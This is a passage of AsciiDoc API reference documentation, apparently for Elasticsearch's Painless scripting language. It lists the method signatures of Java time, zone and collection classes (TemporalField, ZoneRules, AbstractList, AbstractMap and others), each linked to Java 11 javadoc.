{java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalAmount]] -==== TemporalAmount -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#addTo(java.time.temporal.Temporal)[addTo](Temporal) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#get(java.time.temporal.TemporalUnit)[get](TemporalUnit) -* List {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#getUnits()[getUnits]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#subtractFrom(java.time.temporal.Temporal)[subtractFrom](Temporal) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalField]] -==== TemporalField -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#adjustInto(java.time.temporal.Temporal,long)[adjustInto](Temporal, long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* TemporalUnit {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getBaseUnit()[getBaseUnit]() -* null {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getDisplayName(java.util.Locale)[getDisplayName](Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getFrom(java.time.temporal.TemporalAccessor)[getFrom](TemporalAccessor) -* TemporalUnit {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getRangeUnit()[getRangeUnit]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#isDateBased()[isDateBased]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#isSupportedBy(java.time.temporal.TemporalAccessor)[isSupportedBy](TemporalAccessor) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#isTimeBased()[isTimeBased]() -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#range()[range]() -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#rangeRefinedBy(java.time.temporal.TemporalAccessor)[rangeRefinedBy](TemporalAccessor) -* TemporalAccessor {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#resolve(java.util.Map,java.time.temporal.TemporalAccessor,java.time.format.ResolverStyle)[resolve](Map, TemporalAccessor, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalQueries]] -==== TemporalQueries -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#chronology()[chronology]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#localDate()[localDate]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#localTime()[localTime]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#offset()[offset]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#precision()[precision]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#zone()[zone]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#zoneId()[zoneId]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalQuery]] -==== TemporalQuery -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/time/temporal/TemporalQuery.html#queryFrom(java.time.temporal.TemporalAccessor)[queryFrom](TemporalAccessor) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalUnit]] -==== TemporalUnit -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#addTo(java.time.temporal.Temporal,long)[addTo](Temporal, long) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#between(java.time.temporal.Temporal,java.time.temporal.Temporal)[between](Temporal, Temporal) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Duration {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#getDuration()[getDuration]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isDateBased()[isDateBased]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isDurationEstimated()[isDurationEstimated]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isSupportedBy(java.time.temporal.Temporal)[isSupportedBy](Temporal) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isTimeBased()[isTimeBased]() -* null {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#toString()[toString]() - - -[[painless-api-reference-shared-UnsupportedTemporalTypeException]] -==== UnsupportedTemporalTypeException -* {java11-javadoc}/java.base/java/time/temporal/UnsupportedTemporalTypeException.html#(java.lang.String)[UnsupportedTemporalTypeException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ValueRange]] -==== ValueRange -* static ValueRange {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#of(long,long)[of](long, long) -* static ValueRange {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#of(long,long,long)[of](long, long, long) -* static ValueRange {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#of(long,long,long,long)[of](long, long, long, long) -* int {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#checkValidIntValue(long,java.time.temporal.TemporalField)[checkValidIntValue](long, TemporalField) -* long {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#checkValidValue(long,java.time.temporal.TemporalField)[checkValidValue](long, TemporalField) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#getLargestMinimum()[getLargestMinimum]() -* long {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#getMaximum()[getMaximum]() -* long {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#getMinimum()[getMinimum]() -* long {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#getSmallestMaximum()[getSmallestMaximum]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#isFixed()[isFixed]() -* boolean {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#isIntValue()[isIntValue]() -* boolean {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#isValidIntValue(long)[isValidIntValue](long) -* boolean {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#isValidValue(long)[isValidValue](long) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-WeekFields]] -==== WeekFields -* static WeekFields {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#ISO[ISO] -* static WeekFields {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#SUNDAY_START[SUNDAY_START] -* static TemporalUnit {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#WEEK_BASED_YEARS[WEEK_BASED_YEARS] -* static WeekFields {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#of(java.util.Locale)[of](Locale) -* static WeekFields {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#of(java.time.DayOfWeek,int)[of](DayOfWeek, int) -* TemporalField {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#dayOfWeek()[dayOfWeek]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* DayOfWeek {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#getFirstDayOfWeek()[getFirstDayOfWeek]() -* int {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#getMinimalDaysInFirstWeek()[getMinimalDaysInFirstWeek]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* TemporalField {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#weekBasedYear()[weekBasedYear]() -* TemporalField {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#weekOfMonth()[weekOfMonth]() -* TemporalField {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#weekOfWeekBasedYear()[weekOfWeekBasedYear]() -* TemporalField {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#weekOfYear()[weekOfYear]() - - -[role="exclude",id="painless-api-reference-shared-java-time-zone"] -=== Shared API for package java.time.zone -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-ZoneOffsetTransition]] -==== ZoneOffsetTransition -* static ZoneOffsetTransition {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#of(java.time.LocalDateTime,java.time.ZoneOffset,java.time.ZoneOffset)[of](LocalDateTime, ZoneOffset, ZoneOffset) -* int {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#compareTo(java.time.zone.ZoneOffsetTransition)[compareTo](ZoneOffsetTransition) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* LocalDateTime {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#getDateTimeAfter()[getDateTimeAfter]() -* LocalDateTime {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#getDateTimeBefore()[getDateTimeBefore]() -* Duration {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#getDuration()[getDuration]() -* Instant {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#getInstant()[getInstant]() -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#getOffsetAfter()[getOffsetAfter]() -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#getOffsetBefore()[getOffsetBefore]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#isGap()[isGap]() -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#isOverlap()[isOverlap]() -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#isValidOffset(java.time.ZoneOffset)[isValidOffset](ZoneOffset) -* long {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#toEpochSecond()[toEpochSecond]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ZoneOffsetTransitionRule]] -==== ZoneOffsetTransitionRule -* static ZoneOffsetTransitionRule {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#of(java.time.Month,int,java.time.DayOfWeek,java.time.LocalTime,boolean,java.time.zone.ZoneOffsetTransitionRule$TimeDefinition,java.time.ZoneOffset,java.time.ZoneOffset,java.time.ZoneOffset)[of](Month, int, DayOfWeek, LocalTime, boolean, ZoneOffsetTransitionRule.TimeDefinition, ZoneOffset, ZoneOffset, ZoneOffset) -* ZoneOffsetTransition {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#createTransition(int)[createTransition](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getDayOfMonthIndicator()[getDayOfMonthIndicator]() -* DayOfWeek {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getDayOfWeek()[getDayOfWeek]() -* LocalTime {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getLocalTime()[getLocalTime]() -* Month {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getMonth()[getMonth]() -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getOffsetAfter()[getOffsetAfter]() -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getOffsetBefore()[getOffsetBefore]() -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getStandardOffset()[getStandardOffset]() -* ZoneOffsetTransitionRule.TimeDefinition {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getTimeDefinition()[getTimeDefinition]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#isMidnightEndOfDay()[isMidnightEndOfDay]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ZoneOffsetTransitionRule-TimeDefinition]] -==== ZoneOffsetTransitionRule.TimeDefinition -* static ZoneOffsetTransitionRule.TimeDefinition {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule$TimeDefinition.html#STANDARD[STANDARD] -* static ZoneOffsetTransitionRule.TimeDefinition {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule$TimeDefinition.html#UTC[UTC] -* static ZoneOffsetTransitionRule.TimeDefinition {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule$TimeDefinition.html#WALL[WALL] -* static ZoneOffsetTransitionRule.TimeDefinition {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule$TimeDefinition.html#valueOf(java.lang.String)[valueOf](null) -* static ZoneOffsetTransitionRule.TimeDefinition[] {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule$TimeDefinition.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* LocalDateTime {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule$TimeDefinition.html#createDateTime(java.time.LocalDateTime,java.time.ZoneOffset,java.time.ZoneOffset)[createDateTime](LocalDateTime, ZoneOffset, ZoneOffset) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ZoneRules]] -==== ZoneRules -* static ZoneRules {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#of(java.time.ZoneOffset)[of](ZoneOffset) -* static ZoneRules {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#of(java.time.ZoneOffset,java.time.ZoneOffset,java.util.List,java.util.List,java.util.List)[of](ZoneOffset, ZoneOffset, List, List, List) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Duration {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getDaylightSavings(java.time.Instant)[getDaylightSavings](Instant) -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getOffset(java.time.Instant)[getOffset](Instant) -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getStandardOffset(java.time.Instant)[getStandardOffset](Instant) -* ZoneOffsetTransition {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getTransition(java.time.LocalDateTime)[getTransition](LocalDateTime) -* List {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getTransitionRules()[getTransitionRules]() -* List {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getTransitions()[getTransitions]() -* List {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#getValidOffsets(java.time.LocalDateTime)[getValidOffsets](LocalDateTime) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#isDaylightSavings(java.time.Instant)[isDaylightSavings](Instant) -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#isFixedOffset()[isFixedOffset]() -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#isValidOffset(java.time.LocalDateTime,java.time.ZoneOffset)[isValidOffset](LocalDateTime, ZoneOffset) -* ZoneOffsetTransition {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#nextTransition(java.time.Instant)[nextTransition](Instant) -* ZoneOffsetTransition {java11-javadoc}/java.base/java/time/zone/ZoneRules.html#previousTransition(java.time.Instant)[previousTransition](Instant) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ZoneRulesException]] -==== ZoneRulesException -* {java11-javadoc}/java.base/java/time/zone/ZoneRulesException.html#(java.lang.String)[ZoneRulesException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ZoneRulesProvider]] -==== ZoneRulesProvider -* static Set {java11-javadoc}/java.base/java/time/zone/ZoneRulesProvider.html#getAvailableZoneIds()[getAvailableZoneIds]() -* static ZoneRules {java11-javadoc}/java.base/java/time/zone/ZoneRulesProvider.html#getRules(java.lang.String,boolean)[getRules](null, boolean) -* static NavigableMap {java11-javadoc}/java.base/java/time/zone/ZoneRulesProvider.html#getVersions(java.lang.String)[getVersions](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-util"] -=== Shared API for package java.util -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-AbstractCollection]] -==== AbstractCollection -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AbstractList]] -==== AbstractList -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AbstractMap]] -==== AbstractMap -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-AbstractMap-SimpleEntry]] -==== AbstractMap.SimpleEntry -* {java11-javadoc}/java.base/java/util/AbstractMap$SimpleEntry.html#(java.util.Map$Entry)[AbstractMap.SimpleEntry](Map.Entry) -* {java11-javadoc}/java.base/java/util/AbstractMap$SimpleEntry.html#(java.lang.Object,java.lang.Object)[AbstractMap.SimpleEntry](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map$Entry.html#equals(java.lang.Object)[equals](Object) -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#getKey()[getKey]() -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/util/Map$Entry.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#setValue(java.lang.Object)[setValue](def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AbstractMap-SimpleImmutableEntry]] -==== AbstractMap.SimpleImmutableEntry -* {java11-javadoc}/java.base/java/util/AbstractMap$SimpleImmutableEntry.html#(java.util.Map$Entry)[AbstractMap.SimpleImmutableEntry](Map.Entry) -* {java11-javadoc}/java.base/java/util/AbstractMap$SimpleImmutableEntry.html#(java.lang.Object,java.lang.Object)[AbstractMap.SimpleImmutableEntry](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map$Entry.html#equals(java.lang.Object)[equals](Object) -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#getKey()[getKey]() -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/util/Map$Entry.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#setValue(java.lang.Object)[setValue](def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AbstractQueue]] -==== AbstractQueue -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* 